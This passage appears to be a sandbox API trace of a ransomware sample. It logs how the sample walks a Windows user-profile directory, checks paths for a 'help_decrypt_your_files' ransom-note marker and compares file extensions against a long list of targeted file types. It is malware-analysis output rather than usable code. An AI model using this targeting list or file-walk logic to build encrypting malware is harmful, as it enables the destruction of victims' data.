mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".blf") returned 0x0
	[0179.432] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d5f4e96, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8d5f4e96, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8d61ae52, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1
	[0179.432] lstrcmpW (lpString1="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1
	[0179.432] lstrcmpW (lpString1="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1
	[0179.432] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.432] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms") returned="C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms"
	[0179.433] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms") returned 109
	[0179.433] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.433] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cchLength=0x6d | out: lpsz="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms") returned 0x6d
	[0179.433] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.433] StrStrW (lpFirst="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.433] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms" | out: lpString1="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms") returned="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms"
	[0179.433] lstrlenW (lpString="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms") returned 109
	[0179.433] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.434] StrStrW (lpFirst=".regtrans-ms", lpSrch=".") returned=".regtrans-ms"
	[0179.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.434] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".regtrans-ms") returned 0x0
	[0179.434] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d61ae52, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8d61ae52, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8d61ae52, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1
	[0179.434] lstrcmpW (lpString1="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1
	[0179.434] lstrcmpW (lpString1="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1
	[0179.435] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.435] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms") returned="C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms"
	[0179.435] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms") returned 109
	[0179.435] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.435] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cchLength=0x6d | out: lpsz="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms") returned 0x6d
	[0179.435] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.435] StrStrW (lpFirst="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.435] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms" | out: lpString1="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms") returned="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms"
	[0179.436] lstrlenW (lpString="c:\\users\\default\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms") returned 109
	[0179.436] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.436] StrStrW (lpFirst=".regtrans-ms", lpSrch=".") returned=".regtrans-ms"
	[0179.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.436] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.f